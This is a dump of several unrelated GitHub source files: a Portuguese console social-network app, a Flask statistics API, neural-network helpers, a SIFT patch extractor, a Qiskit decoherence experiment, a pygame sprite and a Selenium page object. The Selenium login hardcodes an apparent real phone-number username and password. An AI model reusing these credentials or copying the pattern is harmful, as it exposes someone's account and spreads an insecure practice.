pensando?\\n')\r\n arquivo = input('Deseja adicionar alguma mídia? [Sim/Não]\\n').strip().upper()\r\n if arquivo == 'SIM':\r\n pub = f'\\033[1;34m-->\\033[m{legenda}\\n\\033[1;34m~\\033[mMídia\\033[1;34m~\\033[m'\r\n print('\\033[0;36m-\\033[m' * 40)\r\n print()\r\n print(pub)\r\n print(\r\n '\\n\\033[1;34m|\\033[mCurtir\\033[1;34m|\\033[mComentar\\033[1;34m|\\033[mCompartilhar\\033[1;34m|\\033[mRepublicar\\033[1;34m|\\033[m')\r\n print('\\033[0;36m-\\033[m' * 40)\r\n elif arquivo == 'NÃO' or arquivo == 'NAO':\r\n print('\\033[0;36m-\\033[m' * 40)\r\n print()\r\n pub = legenda\r\n print(f'\\033[1;34m-->\\033[m{pub}')\r\n print()\r\n print('\\033[0;36m-\\033[m' * 40)\r\n\r\ndef eventos():\r\n try:\r\n print('\\033[4mEventos disponíveis:\\033[m\\n')\r\n print(\"\\033[1m[1]\\033[m-Recife,PE\\n\\033[1m[2]\\033[m-Olinda,PE\\n\\033[1m[3]\\033[m-Jaboatão dos Guararapes,PE\\n\"\r\n \"\\033[1m[4]\\033[m-Caruaru,PE\\n\\033[1m[5]\\033[m-Buenos Aires,PE\")\r\n localizacao = int(input(\"-Qual sua localização? \"))\r\n eventos_recife = [\"Evento 1\", \"Evento 2\", \"Evento 3\"]\r\n eventos_olinda = [\"Evento 1\", \"Evento 2\", \"Evento 3\"]\r\n eventos_jaboatao = [\"Evento 1\", \"Evento 2\", \"Evento 3\"]\r\n eventos_caruaru = [\"Evento 1\", \"Evento 2\", \"Evento 3\"]\r\n eventos_buenos_aires = [\"Evento 1\", \"Evento 2\", \"Evento 3\"]\r\n\r\n if localizacao == 1:\r\n print(\"\\n\\033[1;34mEventos em Recife,PE:\\033[m\")\r\n cont = 0\r\n for evento in eventos_recife:\r\n cont += 1\r\n print(f\"\\033[1m[{cont}]\\033[m\", evento)\r\n\r\n elif localizacao == 2:\r\n print(\"\\n\\033[1;34mEventos em Olinda,PE:\\033[m\")\r\n cont = 0\r\n for evento in eventos_olinda:\r\n cont += 1\r\n print(f\"\\033[1m[{cont}]\\033[m\", evento)\r\n\r\n elif localizacao == 3:\r\n print(\"\\n\\033[1;34mEventos em Jaboatão dos Guararapes,PE:\\033[m\")\r\n cont = 0\r\n for evento in eventos_jaboatao:\r\n cont += 1\r\n print(f\"\\033[1m[{cont}]\\033[m\", evento)\r\n\r\n elif localizacao == 4:\r\n print(\"\\n\\033[1;34mEventos em Caruaru,PE:\\033[m\")\r\n cont = 0\r\n for evento in eventos_caruaru:\r\n cont += 1\r\n print(f\"\\033[1m[{cont}]\\033[m\", evento)\r\n\r\n elif localizacao == 5:\r\n print(\"\\n\\033[1;34mEventos em Buenos Aires,PE:\\033[m\")\r\n cont = 0\r\n for evento in eventos_buenos_aires:\r\n cont += 1\r\n print(f\"\\033[1m[{cont}]\\033[m\", evento)\r\n\r\n else:\r\n print(\"Opção inválida!\")\r\n\r\n escolha = int(input(\"Digite o número do evento escolhido: \"))\r\n if localizacao == 1 and 1 <= escolha <= len(eventos_recife):\r\n evento_escolhido = eventos_recife[escolha - 1]\r\n print(\"Você escolheu o evento:\", evento_escolhido)\r\n print('\\033[0;36m-\\033[m' * 40)\r\n print(\"\\033[0;34m*INFORMAÇÕES DO EVENTO*\\033[m\".center(50))\r\n print('\\033[0;36m-\\033[m' * 40)\r\n\r\n elif localizacao == 2 and 1 <= escolha <= len(eventos_olinda):\r\n evento_escolhido = eventos_olinda[escolha - 1]\r\n print(\"Você escolheu o evento:\", evento_escolhido)\r\n print('\\033[0;36m-\\033[m' * 40)\r\n print(\"\\033[0;34m*INFORMAÇÕES DO EVENTO*\\033[m\".center(50))\r\n print('\\033[0;36m-\\033[m' * 40)\r\n\r\n elif localizacao == 3 and 1 <= escolha <= len(eventos_jaboatao):\r\n evento_escolhido = eventos_jaboatao[escolha - 1]\r\n print(\"Você escolheu o evento:\", evento_escolhido)\r\n print('\\033[0;36m-\\033[m' * 40)\r\n print(\"\\033[0;34m*INFORMAÇÕES DO EVENTO*\\033[m\".center(50))\r\n print('\\033[0;36m-\\033[m' * 40)\r\n\r\n elif localizacao == 4 and 1 <= escolha <= len(eventos_caruaru):\r\n evento_escolhido = eventos_caruaru[escolha - 1]\r\n print(\"Você escolheu o evento:\", evento_escolhido)\r\n print('\\033[0;36m-\\033[m' * 40)\r\n print(\"\\033[0;34m*INFORMAÇÕES DO EVENTO*\\033[m\".center(50))\r\n print('\\033[0;36m-\\033[m' * 40)\r\n\r\n elif localizacao == 5 and 1 <= escolha <= len(eventos_buenos_aires):\r\n evento_escolhido = eventos_buenos_aires[escolha - 1]\r\n print(\"Você escolheu o evento:\", evento_escolhido)\r\n print('\\033[0;36m-\\033[m' * 40)\r\n print(\"\\033[0;34m*INFORMAÇÕES DO EVENTO*\\033[m\".center(50))\r\n print('\\033[0;36m-\\033[m' * 40)\r\n\r\n else:\r\n print(\"Opção inválida!\")\r\n except ValueError:\r\n print(\"Digite o número correspondente à sua localização.\")\r\n\r\ndef carregar_dados():\r\n armazenar_dados = {}\r\n try:\r\n with open('comunidades.csv', 'r') as arquivo:\r\n leitor = csv.reader(arquivo)\r\n next(leitor)\r\n for linha in leitor:\r\n comunidade = linha[0]\r\n quantidade_pessoas = int(linha[1])\r\n membros = linha[2:] if len(linha) > 2 else []\r\n armazenar_dados[comunidade] = {\r\n 'Quantidade de Pessoas': quantidade_pessoas, 'Membros': membros}\r\n arquivo.close()\r\n except FileNotFoundError:\r\n pass\r\n return armazenar_dados\r\n\r\ndef salvar_dados(armazenar_dados):\r\n with open('comunidades.csv', 'w', newline='') as arquivo:\r\n escrita = csv.writer(arquivo)\r\n escrita.writerow(['Comunidade', 'Quantidade de Pessoas', 'Membros'])\r\n for comunidade, info in armazenar_dados.items():\r\n quantidade_pessoas = info['Quantidade de Pessoas']\r\n membros = info['Membros']\r\n escrita.writerow([comunidade, quantidade_pessoas] + membros)\r\n arquivo.close()\r\n\r\n\r\ndef exibir_menu(armazenar_dados):\r\n print('\\n\\033[1;34m-Comunidades:\\033[m')\r\n linha = 1\r\n for comunidade in armazenar_dados:\r\n print(f'[{linha}] - {comunidade}')\r\n linha += 1\r\n print(f'\\033[1m[{linha}]\\033[m- Criar comunidade')\r\n print(f'\\033[1m[{linha+1}]\\033[m- Visualizar membros')\r\n\r\n\r\ndef visualizar_membros(armazenar_dados):\r\n comunidade_escolhida = int(input('Digite o número da comunidade: '))\r\n comunidades = list(armazenar_dados.keys())\r\n if 1 <= comunidade_escolhida <= len(comunidades):\r\n comunidade = comunidades[comunidade_escolhida - 1]\r\n membros = armazenar_dados[comunidade]['Membros']\r\n print(f'Membros da comunidade {comunidade}:')\r\n for membro in membros:\r\n print(membro)\r\n else:\r\n print('Número de comunidade inválido!')\r\n\r\ndef comunidade():\r\n armazenar_dados = carregar_dados()\r\n exibir_menu(armazenar_dados)\r\n\r\n opcao = int(input('Digite a opção desejada: '))\r\n if 1 <= opcao <= len(armazenar_dados):\r\n comunidades = list(armazenar_dados.keys())\r\n comunidade_escolhida = comunidades[opcao - 1]\r\n nome_pessoa = input('Digite o seu nome: ')\r\n print(\r\n f'{nome_pessoa}, você é um novo membro da comunidade {comunidade_escolhida}!')\r\n armazenar_dados[comunidade_escolhida]['Quantidade de Pessoas'] += 1\r\n armazenar_dados[comunidade_escolhida]['Membros'].append(nome_pessoa)\r\n elif opcao == len(armazenar_dados) + 1:\r\n nome_comunidade = input('Digite o nome da nova comunidade: ')\r\n if nome_comunidade not in armazenar_dados:\r\n armazenar_dados[nome_comunidade] = {'Quantidade de Pessoas': 1, 'Membros': []}\r\n print(f'Você é um novo membro da comunidade {nome_comunidade}!')\r\n else:\r\n print(f'A comunidade {nome_comunidade} já existe!')\r\n elif opcao == len(armazenar_dados) + 2:\r\n visualizar_membros(armazenar_dados)\r\n else:\r\n print('Opção inválida!')\r\n\r\n salvar_dados(armazenar_dados)\r\n\r\n\r\ninicio()\r\n\r\n","repo_name":"xjuveri/ProjetoE-stuario","sub_path":"projetos.py","file_name":"projetos.py","file_ext":"py","file_size_in_byte":12332,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73572210084","text":"from flask import Blueprint, request, jsonify, make_response\nfrom App.Domain.Analisis.datos_generales import obtener_departamentos_y_municipios_colegios,\\\n total_registros_niveles_desempeno_por_calendario, probabilidad_puntaje\nfrom App.Domain.General.cambiar_datasets import cambiar_datasets\n\ngeneralData = Blueprint('general_data', __name__)\n\n\n@generalData.route('/datos-generales/departamentos-municipios-cole')\ndef obtener_departamentos_y_municipios():\n data = request.args\n print(\"Departamentos y municipio periodo\",data.get('periodo',''))\n result = obtener_departamentos_y_municipios_colegios(int(data.get('periodo','')))\n return make_response(jsonify(result), 200)\n\n\n@generalData.route('/datos-generales/promedios-desempenos')\ndef obtener_promedios_y_desempenos():\n data = request.args\n print(data)\n result = total_registros_niveles_desempeno_por_calendario(data.get('calendario'),\n data.get('departamento'),\n data.get('municipio'),\n data.get('colegio'))\n return make_response(jsonify(result), 200)\n\n\n@generalData.route('/datos-generales/probabilidad-puntaje')\ndef probabilidad_de_puntaje():\n data = request.args\n result = {\n \"respuesta\": probabilidad_puntaje(\n int(data.get('periodo', '')),\n data.get('puntaje', ''),\n int(data.get('limite_inf', '')),\n int(data.get('limite_sup', '')),\n data.get('departamento'),\n data.get('municipio'),\n )\n }\n return make_response(jsonify(result), 200)\n\n\n@generalData.route('/datos-generales/cambiar-datasets')\ndef cambiar_datasets_endpoint():\n data = request.args\n booleano = data.get('depurar') == 'true'\n result = {\n \"respuesta\": cambiar_datasets(\n booleano,\n )\n }\n return make_response(jsonify(result), 200)\n","repo_name":"lkavila/Saber11Api","sub_path":"App/Controllers/General/general_controller.py","file_name":"general_controller.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69885427365","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\"\"\"\nimport torch\nimport scipy.integrate\nimport numpy as np\nimport os, sys\nimport matlab.engine\n\nif 'windows' in sys.platform:\n bar = '\\\\'\nelse:\n bar = '/'\n\ndef matlab_interface(): # creates Matlab-Python interface\n parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n sys.path.append(parent_dir) \n eng = matlab.engine.start_matlab()\n eng.addpath(parent_dir + bar + \"SimulationFramework\", nargout= 0)\n eng.addpath(parent_dir + bar + \"SimulationFramework\" + bar + \"background\", \n nargout= 0)\n eng.addpath(parent_dir + bar + \"SimulationFramework\" + bar + \"background\" \n + bar + \"utils\", nargout= 0)\n eng.addpath(parent_dir + bar + \"SimulationFramework\" + bar + \"background\"\n + bar + \"CrossSectionData\", nargout= 0)\n eng.addpath(parent_dir + bar + \"SimulationFramework\" + bar + \"test_results\",\n nargout= 0)\n return eng\n\n\nclass ObjectView(object): # simplifies accessing the hyperparameters\n def __init__(self, d): \n self.__dict__ = d\n \n\ndef integrate_model(model, t_span, y0, use_torch=True, **kwargs): # integrates the generated NN models over time\n def fun(t, x):\n if use_torch:\n x = torch.tensor(x, requires_grad=True, \n dtype=torch.float32).reshape(1,len(y0))\n t = torch.zeros_like(x[...,:1])\n else:\n x = x.reshape(1,len(y0))\n t = np.zeros_like(x[...,:1])\n dx = model(x, t=t).reshape(-1)\n if use_torch:\n dx = dx.data.numpy()\n return dx\n return scipy.integrate.solve_ivp(fun=fun, t_span=t_span, y0=y0, **kwargs)\n\n\ndef normalize(data_raw, x_denorm, norm_range): # normalizes the features\n x_norm = np.empty(x_denorm.shape)\n n_DoF = int(x_norm.shape[1]/2)\n for i in range(n_DoF):\n # x_norm[:,i] = (x_denorm[:,i] - np.min(data_raw[:,:]))/np.ptp(data_raw) \n x_norm[:,i] = np.ptp(norm_range)*(x_denorm[:,i] - np.min(data_raw[:,:n_DoF]))/np.ptp(data_raw[:,:n_DoF]) + norm_range[0] \n x_norm[:,n_DoF+i] = np.ptp(norm_range)*(x_denorm[:,n_DoF+i] - np.min(data_raw[:,n_DoF:]))/np.ptp(data_raw[:,n_DoF:]) + norm_range[0] \n return x_norm\n\n\ndef denormalize(data_raw, x_norm, norm_range): # denormalizes the features\n x_denorm = np.empty(x_norm.shape)\n n_DoF = int(x_denorm.shape[1]/2)\n for i in range(n_DoF):\n # x_denorm[:,i] = x_norm[:,i]*np.ptp(data_raw) + np.min(data_raw)\n x_denorm[:,i] = (x_norm[:,i] - norm_range[0])*np.ptp(data_raw[:,:n_DoF])/np.ptp(norm_range) + np.min(data_raw[:,:n_DoF])\n x_denorm[:,n_DoF+i] = (x_norm[:,n_DoF+i] - norm_range[0])*np.ptp(data_raw[:,n_DoF:])/np.ptp(norm_range) + np.min(data_raw[:,n_DoF:])\n return x_denorm\n\n\ndef standardize(data_raw, x_destand): # standardize the features\n x_stand = np.empty(x_destand.shape)\n for i in range(x_destand.shape[1]):\n x_stand[:,i] = (x_destand[:,i] - np.mean(data_raw[:,i]))/np.std(data_raw[:,i]) \n return x_stand\n\n\ndef destandardize(data_raw, x_stand): # destandardizes the features\n x_destand = np.empty(x_stand.shape)\n for i in range(x_destand.shape[1]):\n x_destand[:,i] = x_stand[:,i]*np.std(data_raw[:,i]) + np.mean(data_raw[:,i]) \n return x_stand\n \n\ndef post_process(X_sol, data_raw, model_param, *args):\n for arg in args:\n phi_r = arg\n if model_param.normalize: # denormalizes/destandardizes solution (if enabled):\n X = denormalize(data_raw['x'], X_sol, model_param.norm_range)\n if model_param.model == 'FOM':\n p, q = np.split(X, 2, axis=1) \n elif model_param.model == 'ROM': \n etap, eta = np.split(X, 2, axis=1)\n p, q = (phi_r@etap.T).T, (phi_r@eta.T).T\n elif model_param.standardize: \n X = destandardize(data_raw['x'], X_sol)\n if model_param.model == 'FOM':\n p, q = np.split(X, 2, axis=1) \n elif model_param.model == 'ROM': \n etap, eta = np.split(X, 2, axis=1)\n p, q = (phi_r@etap.T).T, (phi_r@eta.T).T \n else: \n X = X_sol\n if model_param.model == 'FOM':\n p, q = np.split(X, 2, axis=1) \n elif model_param.model == 'ROM': \n etap, eta = np.split(X, 2, axis=1)\n p, q = (phi_r@etap.T).T, (phi_r@eta.T).T\n return p, q\n \n \n \n\n\n\n\n \n","repo_name":"borgessv/MSc-Thesis","sub_path":"NN/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27258250195","text":"import cv2\nimport numpy as np\nfrom joblib import Parallel, delayed\nimport multiprocessing\nimport os\nimport glob\nimport logging\nimport sklearn.preprocessing\nfrom sklearn.decomposition import PCA\nfrom tqdm import tqdm\n\n\nIMG_EXTENSIONS = [\n '.jpg', '.JPG', '.jpeg', '.JPEG',\n '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP', '.tif', '.tiff', '.TIF', '.TIFF'\n]\n\n\ndef is_image_file(filename):\n return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)\n\ndef edge_pixels(mask):\n return np.sum(mask == 255)\n\ndef calc_features(input_img, arguments):\n img = cv2.imread(input_img)\n\n if arguments.scale != -1:\n scale = arguments.scale\n height = img.shape[0] * scale\n width = img.shape[1] * scale\n new_size_mask = (int(width), int(height))\n img = cv2.resize(img, new_size_mask, interpolation=cv2.INTER_CUBIC)\n\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n mask = cv2.Canny(img, 30, 200)\n\n sift = cv2.SIFT_create(sigma=args.sigma)\n kp = sift.detect(img_gray, None)\n\n\n def filter_keypoint(point):\n # if 3 < point.size < 10:\n # return point\n return point\n\n\n new_kp = []\n uniq_kp = []\n\n num_pixel = arguments.win_size ** 2 \n\n for p in kp:\n point = (int(p.pt[0]), int(p.pt[1]))\n\n roi = get_image_patch(img, point[0], point[1], arguments)\n mask_roi = get_image_patch(mask, point[0], point[1], arguments)\n\n if roi is None:\n continue\n\n if arguments.edge_pixels != -1:\n if edge_pixels(mask_roi) < (arguments.edge_pixels * num_pixel):\n continue \n\n if not point in uniq_kp and filter_keypoint(p):\n new_kp.append(p)\n uniq_kp.append(point)\n\n # print(f'{len(new_kp)} kps for {input_img}')\n _, desc = sift.compute(img_gray, new_kp)\n\n if not new_kp:\n desc = np.zeros((1,128))\n kp_tupple = [( (int(img.shape[1]/2), int(img.shape[0]/2)), desc)]\n print(f'Nothing found for {input_img}')\n return kp_tupple\n\n desc = sklearn.preprocessing.normalize(desc, norm='l1')\n desc = np.sign(desc) * np.sqrt(np.abs(desc))\n desc = sklearn.preprocessing.normalize(desc, norm='l2')\n\n kp_tupple = [(p, desc[i]) for i, p in enumerate(uniq_kp)]\n\n\n return kp_tupple\n\n\ndef get_image_patch(img, px, py, arguments):\n half_win_size = int(arguments.win_size / 2)\n if not (half_win_size < px < img.shape[1] - half_win_size and half_win_size < py < img.shape[0] - half_win_size):\n return None\n\n roi = img[py - half_win_size:py + half_win_size, px - half_win_size:px + half_win_size]\n assert roi.shape[:2] == (half_win_size * 2, half_win_size * 2), 'shape of the roi is not (%d,%d). It is (%d,%d)' % \\\n (half_win_size * 2, half_win_size * 2,\n roi.shape[0], roi.shape[1])\n return roi\n\n\ndef extract_patches(filename, tup, args):\n if len(tup) > args.patches_per_page and args.patches_per_page != -1:\n idx = np.linspace(0, len(tup) - 1, args.patches_per_page, dtype=np.int32)\n tup = [tup[i] for i in idx]\n\n points, _ = zip(*tup)\n\n img = cv2.imread(filename)\n\n if args.scale != -1:\n scale = args.scale\n height = img.shape[0] * scale\n width = img.shape[1] * scale\n new_size_mask = (int(width), int(height))\n img = cv2.resize(img, new_size_mask, interpolation=cv2.INTER_CUBIC)\n\n\n count = 0\n for p in points:\n roi = get_image_patch(img, p[0], p[1], args)\n if roi is None:\n continue\n \n out_path = os.path.join(args.out_dir[0], os.path.splitext(os.path.basename(filename))[0],\n os.path.splitext(os.path.basename(filename))[0] + '_' + str(count) + '.png')\n\n count = count + 1\n cv2.imwrite(out_path, roi)\n\n\nif __name__ == \"__main__\":\n import argparse\n import pickle\n\n logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s %(message)s ')\n\n parser = argparse.ArgumentParser(description=\"extract patches from images\")\n parser.add_argument('--in_dir', metavar='in_dir', dest='in_dir', type=str, nargs=1,\n help='input directory', required=True)\n parser.add_argument('--out_dir', metavar='out_dir', dest='out_dir', type=str, nargs=1,\n help='output directory', required=True)\n parser.add_argument('--win_size', metavar='win_size', dest='win_size', type=int, nargs='?',\n help='size of the patch',\n default=32)\n parser.add_argument('--patches_per_page', metavar='patches_per_page', dest='patches_per_page', type=int, nargs='?',\n help='maximal number of patches per page (-1 for no limit)',\n default=-1)\n parser.add_argument('--scale', type=float, help='scale images up or down',\n default=-1)\n parser.add_argument('--sigma', type=float, help='blur factor for SIFT',\n default=1.6)\n parser.add_argument('--edge_pixels', type=float, help='if more black_pixel_thresh percent of the pixels are black -> discard',\n default=0.1)\n \n args = parser.parse_args()\n\n\n assert os.path.exists(args.in_dir[0]), 'in_dir {} does not exist'.format(args.in_dir[0])\n\n\n if not os.path.exists(args.out_dir[0]):\n logging.info('creating directory %s' % args.out_dir[0])\n os.mkdir(args.out_dir[0])\n\n assert len(os.listdir(args.out_dir[0])) == 0, 'out_dir is not empty'\n\n assert args.win_size % 2 == 0, 'win_size must be even'\n\n num_cores = int(multiprocessing.cpu_count() / 2)\n num_cores = 10\n path_to_centers = ''\n\n def chunks(xs, n):\n n = max(1, n)\n return (xs[i:i+n] for i in range(0, len(xs), n))\n\n files = [f for f in glob.glob(args.in_dir[0] + '/**/*.*', recursive=True) if os.path.isfile(f) and is_image_file(f)]\n\n file_lists = list(chunks(files, 5000))\n logging.info(f'{len(list(file_lists))} lists')\n\n for files in file_lists:\n logging.info(files)\n assert len(files) > 0, 'no images found'\n logging.info('Found {} images'.format(len(files)))\n\n logging.info('calculating features for images in %s (number of cores:%d)' % (args.in_dir, num_cores))\n results = []\n\n results = Parallel(n_jobs=num_cores, verbose=9)(delayed(calc_features)(f, args) for f in files)\n\n logging.info('collecting descriptors')\n desc_list = []\n kp_list = []\n fn_list = []\n\n for r, f in tqdm(zip(results, files)):\n if len(r) == 0:\n logging.warning('no keypoints found in file {} '.format(f))\n for kp, desc in r:\n kp_list.append(kp)\n desc_list.append(desc)\n fn_list.append(f)\n\n logging.info('creating labels directories in output directory')\n for fn in set(fn_list):\n f_name = os.path.splitext(os.path.basename(fn))[0]\n if not os.path.exists(os.path.join(args.out_dir[0], str(f_name))):\n os.mkdir(os.path.join(args.out_dir[0], str(f_name)))\n\n # logging.info('copying %i (all patches per page) image patches to %s ' % (kp_list, args.out_dir[0]))\n results = Parallel(n_jobs=num_cores, verbose=9)(\n delayed(extract_patches)(filename, tup, args) for filename, tup in zip(files, results))\n\n config_out_path = os.path.join(args.out_dir[0], 'db-creation-parameters.json')\n logging.info('writing config parameters to {}')\n with open(config_out_path, 'w') as f:\n import json\n\n json.dump(vars(args), f)\n\n out_files = [f for f in glob.glob(args.out_dir[0] + '/**/*.*', recursive=True) if os.path.isfile(f) and is_image_file(f)]\n logging.info(f'done - extracted {len(out_files)} patches')","repo_name":"marco-peer/icdar23","sub_path":"helpers/extract_patches_only_color.py","file_name":"extract_patches_only_color.py","file_ext":"py","file_size_in_byte":7916,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"39960553852","text":"#########################################################################################\n# Idea from https://medium.com/qiskit/getting-to-know-your-quantum-processor-ea418867615f\n#########################################################################################\n\nimport matplotlib.pyplot as plt\nfrom qiskit import Aer, QuantumCircuit, execute, IBMQ, QuantumRegister, ClassicalRegister\nfrom qiskit.visualization import plot_gate_map, plot_error_map\nfrom qiskit.tools.monitor import job_monitor\nimport math\nimport random\n\nnb_qubits = 10\nnb_decoherence = 5\n\nrandom_circuit = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\nrandom.shuffle(random_circuit)\n\n# Init Qasm simulator backend\nqasm = Aer.get_backend('qasm_simulator')\n\n# Init Real Quantum computer\nIBMQ.load_account()\nprovider = IBMQ.get_provider('ibm-q')\nquantum_computer = provider.get_backend('ibmq_16_melbourne')\n\nbackend_sim = quantum_computer # Choose your backend : or \n\n#########################################################\n#########################################################\n# #Circuit\n\n# Quantum Circuit\nq = QuantumRegister(nb_qubits + nb_decoherence, \"game\")\nc = ClassicalRegister(nb_qubits + nb_decoherence)\n\nqc = QuantumCircuit(q, c)\n\n# print(\"00 --A-- 01 --B-- 02 --C-- 03 --D-- 04 --E-- 05 --F-- 06\\n\"\n# \" | | | | | | |\\n\"\n# \" U T S R Q P O\\n\"\n# \" | | | | | | |\\n\"\n# \"14 --N-- 13 --M-- 12 --L-- 11 --K-- 10 --J-- 09 --I-- 08 --H-- 07\")\n\nplot_gate_map(quantum_computer)\n# plt.show()\n\n# Make random pairing\nqubit_decoherence = nb_qubits\nfor i in range(0, nb_qubits):\n if i % 2 == 0:\n qc.rx(math.pi / 2, q[i])\n qc.cx(q[i], q[i + 1])\n qc.ccx(q[i], q[i + 1], q[qubit_decoherence])\n qubit_decoherence += 1\n\nqc.measure(range(nb_qubits + nb_decoherence), range(nb_qubits + nb_decoherence))\n\n# # Drawing the circuit\nqc.draw(output='mpl')\n# plt.show()\n# print(qc)\n\n#########################################################\n#########################################################\n# #Simulating\n\njob = execute(qc, backend_sim, shots=1024, optimization_level=3)\njob_monitor(job)\n\n# Result job\nresult_sim = job.result()\ncounts = result_sim.get_counts()\n\n#########################################################\n#########################################################\n# #Results\n\nvalue_q = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\nfor x in range(0, nb_qubits + nb_decoherence):\n for key in counts:\n if key[x] == \"1\":\n value_q[x] += (1 * int(counts[key]))\n\nvalue_q.reverse()\n\ndef calculus_differencial(value_q):\n # Calculus link between each qubit\n link = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"U\", \"V\"]\n for letter in range(0, 10):\n if 0 <= letter < 6:\n link[letter] = abs(abs(value_q[letter]) - abs(value_q[letter + 1]))\n elif 7 <= letter < 9:\n link[letter] = abs(abs(value_q[letter]) - abs(value_q[letter + 1]))\n if 8 <= letter <= 9:\n link[letter + 1] = abs(abs(value_q[letter]) - abs(value_q[nb_qubits - letter + 4]))\n\n print(\"\",value_q[0],\" -- \",link[0],\" -- \",value_q[1],\" -- \",link[1],\" -- \",value_q[2],\" -- \",link[2],\" -- \",value_q[3],\" -- \",link[3],\" -- \",value_q[4],\" -- \",link[4],\" -- \",value_q[5],\" -- \",link[5],\" -- \",value_q[6],\"\\n\"\n \" | |\\n\"\n \" \",link[10],\" \",link[9],\"\\n\"\n \" | |\\n\"\n \" \",value_q[9],\" -- \",link[8],\" -- \",value_q[8],\" -- \",link[7],\" -- \",value_q[7])\n\n return 0\ncalculus_differencial(value_q)\n\nprint(\"Value qubits : \", value_q)\n\nif backend_sim == quantum_computer:\n plot_error_map(quantum_computer)\n qubit_decoherence = nb_qubits\n value_decoherence = [0, 0, 0, 0, 0]\n for i in range(0, nb_qubits):\n if i % 2 == 0:\n value_decoherence[qubit_decoherence - 10] = ((value_q[qubit_decoherence] - value_q[i]) + (value_q[qubit_decoherence] - value_q[i + 1])) / 512\n print(\"q\", i, \"[\", value_q[qubit_decoherence], \"-\", value_q[i], \"] + q\", i + 1, \"[\", value_q[qubit_decoherence], \"-\", value_q[i + 1], \"] => \", (value_q[qubit_decoherence] - value_q[i]) + (value_q[qubit_decoherence] - value_q[i + 1]), \"/ 512 = \", value_decoherence[qubit_decoherence - 10])\n qubit_decoherence += 1\n\n value_q[i] *= 1 + value_decoherence[qubit_decoherence - nb_qubits - 1]\n value_q[i] = round(value_q[i])\n\n calculus_differencial(value_q)\n\n# # Show the results\n# print(counts)\n# plot_histogram(counts)\nplt.show()\n","repo_name":"mickahell/quantum_experiments","sub_path":"qiskit/qubits-system/correction_decoherence.py","file_name":"correction_decoherence.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"24877511334","text":"import pygame as pg\r\n\r\nfrom vars import WIDTH\r\n\r\n\r\nclass Sprite(pg.sprite.Sprite):\r\n def __init__(self, groups: pg.sprite.Group, image):\r\n super().__init__(groups)\r\n\r\n self.image = pg.image.load(image)\r\n self.rect = self.image.get_rect()\r\n self.leftPressed, self.rightPressed = False, False\r\n self.h_speed = 30\r\n\r\n self.collected_ingredients = []\r\n self.rect.x = 500\r\n\r\n def draw(self, screen):\r\n # print(help(self.image))\r\n screen.blit(self.image, (self.rect.x, 450))\r\n\r\n def handle_input(self, event):\r\n if event.type == pg.KEYDOWN:\r\n if event.key == pg.K_LEFT:\r\n self.leftPressed = True\r\n elif event.key == pg.K_RIGHT:\r\n self.rightPressed = True\r\n\r\n elif event.type == pg.KEYUP:\r\n if event.key == pg.K_LEFT:\r\n self.leftPressed = False\r\n elif event.key == pg.K_RIGHT:\r\n self.rightPressed = False\r\n\r\n def update(self):\r\n if self.rect.x < 0:\r\n self.rect.x = 5\r\n elif self.rect.x > WIDTH:\r\n self.rect.x = WIDTH - 300\r\n\r\n if self.leftPressed and not self.rightPressed:\r\n self.rect.x -= self.h_speed\r\n elif self.rightPressed and not self.leftPressed:\r\n self.rect.x += self.h_speed\r\n","repo_name":"nathan-the-coder/Survival-Cook","sub_path":"sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37895580816","text":"import time\nfrom framework.base_page import BasePage\n\n\nclass PrivateManager(BasePage):\n \"\"\"私募基金经理详情页\"\"\"\n\n homepage = 'xpath=>//*[@id=\"navUl\"]/li[1]/a' # 首页\n username = 'xpath=>//*[@id=\"userName\"]' # 手机号\n password = 'xpath=>//*[@id=\"password\"]' # 密码\n button = 'xpath=>//*[@id=\"btnSubmit\"]' # 登录\n pre_screening = 'xpath=>//*[@id=\"navUl\"]/li[3]/span' # 投前筛选\n fund_manager = 'xpath=>//*[@id=\"navUl\"]/li[3]/ul/li[3]/a' # 基金经理\n key_word = 'xpath=>//*[@id=\"keyword\"]' # 关键字\n sure = 'xpath=>//*[@id=\"pubconfirmBtn\"]' # 确定\n details = 'xpath=>//*[@id=\"main-grid\"]/tbody/tr[1]/td[2]/a' # 基金经理链接\n y1_manager = 'xpath=>//*[@id=\"lastYear\"]' # 近一年\n y1_rank = 'xpath=>//*[@id=\"indexanalysis\"]/button[3]' # 近一年\n y1_risk = 'xpath=>//*[@id=\"rankingDate2\"]/button[2]' # 近一年\n super_yield = 'xpath=>//*[@id=\"profit\"]/option[2]' # 超额年化收益率\n bate_coefficient = 'xpath=>//*[@id=\"change\"]/option[4]' # 贝塔系数\n up_list = 'xpath=>//*[@id=\"incomeUl\"]/li[2]' # 已清盘基金\n fund_link = 'xpath=>//*[@id=\"rateindicatorsCharts\"]/tbody/tr[1]/td[1]/a' # 基金链接\n mechanism_link = 'xpath=>//*[@id=\"institutions\"]/span' # 所在机构链接\n\n def private_manager_login(self):\n \"\"\"登录\"\"\"\n self.click(self.homepage)\n time.sleep(2)\n self.type(self.username, '15107045860')\n time.sleep(2)\n self.type(self.password, '045860')\n time.sleep(2)\n self.click(self.button)\n time.sleep(2)\n 